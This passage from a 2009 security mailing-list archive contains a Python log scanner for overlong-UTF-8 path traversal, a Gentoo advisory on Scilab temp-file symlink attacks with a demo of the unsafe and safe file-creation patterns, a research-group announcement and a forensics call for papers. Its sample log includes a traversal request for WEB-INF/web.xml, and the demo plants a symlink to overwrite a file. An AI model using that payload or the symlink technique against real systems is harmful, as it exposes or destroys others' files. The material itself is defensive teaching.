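# Added example, not Oracle's or any JVM's code. The lenient decoder below is
# a constructed model of overlong-accepting behaviour, not real server code.

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def lenient_utf8_decode(data):
    """Decode ASCII and two-byte sequences WITHOUT the overlong check.
    C0 AE -> ((0xC0 & 0x1F) << 6) | (0xAE & 0x3F) = 0x2E = '.'"""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def strict_decode_path(raw_path):
    """Percent-decode, then decode as strict UTF-8 (rejects overlong forms
    such as %c0%ae), then refuse any '..' segment in the decoded path."""
    text = unquote_to_bytes(raw_path).decode("utf-8")  # strict by default
    if any(segment == ".." for segment in text.split("/")):
        raise ValueError("parent-directory segment in path")
    return text


def classify_request_path(raw_path):
    try:
        strict_decode_path(raw_path)
        return "ok"
    except UnicodeDecodeError:  # must precede ValueError: it is a subclass
        return "reject: invalid or overlong UTF-8"
    except ValueError:
        return "reject: traversal"


def scan_access_log(lines):
    """Return (request_path, verdict) for every line that is not 'ok'."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match:
            verdict = classify_request_path(match.group(1))
            if verdict != "ok":
                findings.append((match.group(1), verdict))
    return findings


SAMPLE_LOG = [  # constructed lines, not real traffic
    '10.0.0.5 - - [21/Jan/2009:10:00:01 +0000] "GET /web-app/foobar/index.jsp HTTP/1.1" 200 512',
    '10.0.0.7 - - [21/Jan/2009:10:00:02 +0000] "GET /web-app/foobar/%c0%ae%c0%ae/WEB-INF/web.xml HTTP/1.1" 200 2048',
    '10.0.0.9 - - [21/Jan/2009:10:00:03 +0000] "GET /web-app/foobar/../WEB-INF/web.xml HTTP/1.1" 404 300',
    '10.0.0.9 - - [21/Jan/2009:10:00:04 +0000] "GET /caf%c3%a9/menu.jsp HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    print(repr(lenient_utf8_decode(b"\xc0\xae\xc0\xae")))
    for path, verdict in scan_access_log(SAMPLE_LOG):
        print(verdict, path)
```

Note that the lenient decoder is correct for well-formed input (C3 A9 still yields 'é'), which is why the bug is easy to miss: the only difference is that it also accepts encodings the standard forbids, and a path check performed before that decoding step never sees the dots.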




Digital Security opens a site of its research center DSec Research Group

2009-01-21 Thread Digital Security Research Group
Digital Security opens a site of its research center DSec Research Group

Digital Security opens a site of its research center DSec Research
Group [DSecRG], the main mission of which is to conduct research on different 
application and system vulnerabilities.
The result of this work is then used by the experts of the Digital Security 
audit department for assessing the security level of information systems with 
the use of active audit methods and also while carrying out penetration tests.

Data about the vulnerabilities found by DSecRG experts is published in 
SecurityFocus mailing lists,
Milw0rm.com portal and now it is available at DSecRG website ( www.dsecrg.com ) 
in the form of advisories and whitepapers.








Digital Security Research Group
__
DIGITAL SECURITY
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: resea...@dsec.ru
www.dsecrg.com
www.dsec.ru





[ GLSA 200901-14 ] Scilab: Insecure temporary file usage

2009-01-21 Thread Pierre-Yves Rofes
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200901-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Scilab: Insecure temporary file usage
  Date: January 21, 2009
  Bugs: #245922
ID: 200901-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


An insecure temporary file usage has been reported in Scilab, allowing
for symlink attacks.

Background
==

Scilab is a scientific software package for numerical computations.

Affected packages
=

---
 Package                  /  Vulnerable  /   Unaffected
---
  1  sci-mathematics/scilab   < 4.1.2-r1     >= 4.1.2-r1

Description
===

Dmitry E. Oboukhov reported an insecure temporary file usage within the
scilink, scidoc and scidem scripts.

Impact
==

A local attacker could perform symlink attacks to overwrite arbitrary
files with the privileges of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Scilab users should upgrade to the latest version:

 # emerge --sync
 # emerge --ask --oneshot --verbose ">=sci-mathematics/scilab-4.1.2-r1"

References
==

  [ 1 ] CVE-2008-4983
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4983

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200901-14.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



signature.asc
Description: OpenPGP digital signature
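The GLSA above describes a temporary file opened under a predictable name, which lets a local user plant a symlink there in advance and have the application overwrite the link's target with its own privileges. The following is an added example, not Scilab's scripts: the unsafe open (O_CREAT without O_EXCL) beside the safe one (O_CREAT|O_EXCL|O_NOFOLLOW, which fails with EEXIST if anything already exists at the name) and the standard-library equivalent, tempfile.mkstemp, which also randomises the name. The directory, the "victim" file and the predictable name in the demo are constructed for this example.

```python
import errno
import os
import shutil
import tempfile

# Added example, not Scilab's code: the temporary-file mistake the GLSA
# describes and two ways to fix it.


def write_temp_unsafe(path, data):
    """Predictable name, O_CREAT without O_EXCL: an existing symlink at
    `path` is followed and its target is truncated and overwritten."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    try:
        os.write(fd, data)
    finally:
        os.close(fd)


def write_temp_safe(path, data):
    """O_EXCL makes creation atomic: if anything (file or symlink) already
    exists at `path`, open() fails with EEXIST instead of using it."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, 0o600)
    try:
        os.write(fd, data)
    finally:
        os.close(fd)


def write_temp_stdlib(directory, data):
    """mkstemp does the O_CREAT|O_EXCL open itself, with an unpredictable
    name, and returns the descriptor so the caller never reopens by name."""
    fd, path = tempfile.mkstemp(prefix="scilab_", dir=directory)
    try:
        os.write(fd, data)
    finally:
        os.close(fd)
    return path


def demo():
    """Constructed scenario: a victim file and a symlink planted at the
    predictable temp name. Returns what each variant did."""
    root = tempfile.mkdtemp(prefix="tmpfile-demo-")
    victim = os.path.join(root, "victim.txt")
    with open(victim, "w") as f:
        f.write("original contents\n")
    predictable = os.path.join(root, "scilab_tmp_1234")  # constructed name
    os.symlink(victim, predictable)  # the planted link, created for the demo

    result = {}
    write_temp_unsafe(predictable, b"written by the program\n")
    with open(victim) as f:
        result["victim_after_unsafe"] = f.read()  # victim was overwritten
    try:
        write_temp_safe(predictable, b"written by the program\n")
        result["safe_refused"] = False
    except OSError as exc:
        result["safe_refused"] = exc.errno == errno.EEXIST
    path = write_temp_stdlib(root, b"ok\n")
    result["stdlib_ok"] = (os.path.isfile(path) and not os.path.islink(path)
                           and os.path.basename(path) != "scilab_")
    shutil.rmtree(root)
    return result


if __name__ == "__main__":
    print(demo())
```

The fix is not the random name on its own (a name can still be guessed or raced) but the exclusive create: the program only ever writes to a file it is certain it created itself.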


[IMF 2009] Call for Papers

2009-01-21 Thread Oliver Goebel
Dear all,

for your information.

Please excuse possible cross postings.




   CALL FOR PAPERS

  IMF 2009

 5th International Conference
  on IT Security Incident Management & IT Forensics

 September 15th - 17th, 2009
  Stuttgart, Germany




CONFERENCE BACKGROUND
=====================

Information and communication technology is more and more becoming an
integral and in most cases even a vital part of life.  The worldwide
economy, public administration, health care, education and even personal
life depend on working IT.  Constriction of the availability of its
service, loss of confidentiality or alteration of data processed, or
loss of integrity of the IT infrastructure usually lead to serious or
disastrous consequences.  Hence security plays an increasingly important
role for operators and users of IT systems and infrastructures.

The establishment of static security measures like policies, standards,
and guidelines is slowly but steadily getting more common amongst IT
operators.  Nevertheless, in the vast majority of cases, operators do not
have the capability to detect and respond to security incidents or to do a
forensic analysis of their traces that can be used in a lawsuit.
Jurisdiction in most countries is starting to change and applies
regulations on the legal duty to maintain safety to operators of IT.  Hence
incident response capabilities become indispensable to avoid successful
assertion of claims for damages caused by compromised or misused
systems.


CONFERENCE GOALS
================

IMF's intent is to gather experts from throughout the world in order to
present and discuss recent technical and methodical advances in the
fields of IT security incident response and management and IT forensics.
The conference provides a platform for collaboration and exchange of
ideas between industry, academia, law-enforcement and other government
bodies.


CONFERENCE TOPICS
=================

The scope of IMF 2009 is broad and includes, but is not limited to the
following areas:

IT Incident Response

* Procedures and Methods of Incident Response
* Formats and Standardization for Incident Response
* Tools Supporting Incident Response
* Incident Analysis
* CERTs/CSIRTs
* Sources of Information, Information Exchange, Communities
* Dealing with Vulnerabilities (Vulnerability Response)
* Monitoring and Early Warning
* Education and Training
* Organizations
* Legal Aspects (Jurisdiction, Applicable Laws and Regulations)

IT Forensics

* Trends and Challenges in IT Forensics
* Techniques, Tools and Procedures in IT Forensics
* Methods for the Gathering, Handling, Processing and Analysis of
 Digital Evidence
* Evidence Protection in IT Environments
* Standardization in IT Forensics
* Education and Training
* Organizations
* Legal Aspects (Jurisdiction, Applicable Laws and Regulations)


Submission Details
==================

IMF invites the submission of full papers of up to 20 pages, presenting
novel and mature research results, as well as practice papers of up to 20
pages, describing best practices, case studies or lessons learned.
Proposals for workshops, discussions and presentations on practical methods
and challenges are also welcome.

All submissions must be written in English (see below), and either in
postscript or PDF format.  Authors of accepted papers must ensure that
their papers will be presented at the conference.

Submitted full papers must not substantially overlap papers that have
been published or that are simultaneously submitted to a journal or a
conference with proceedings.

All submissions will be reviewed by the program committee and papers
accepted to be presented at the conference will be included in the
conference proceedings.

Details on the electronic submission procedure as well as detailed
registration information and formatting instructions are provided on
the conference web site (http://www.imf-conference.org).


Language
--------
IMF 2009's scope is international, hence all submissions must be written
in English. Presentations of accepted papers must also be given in
English.


Publication
---
Accepted papers will be published in IEEE Computer Society's Conference
Publishing Series. Each participant of the conference will receive a
printed copy.


Dates and Deadlines
---
The deadline for paper submission is May 18th, 2009. Notification of
acceptance will be sent by June 8th, 2009 at the latest. You may get your
notification earlier than that. Final camera-ready copies of papers are due
on June 19th, 2009.

* May 18th, 2009:  Deadline for Submissions
* June 8th, 2009: Notification of acceptance or rejection
* June 19th, 2009: Final camera-ready copy due
* September 15th - 17th, 2009: IMF 2009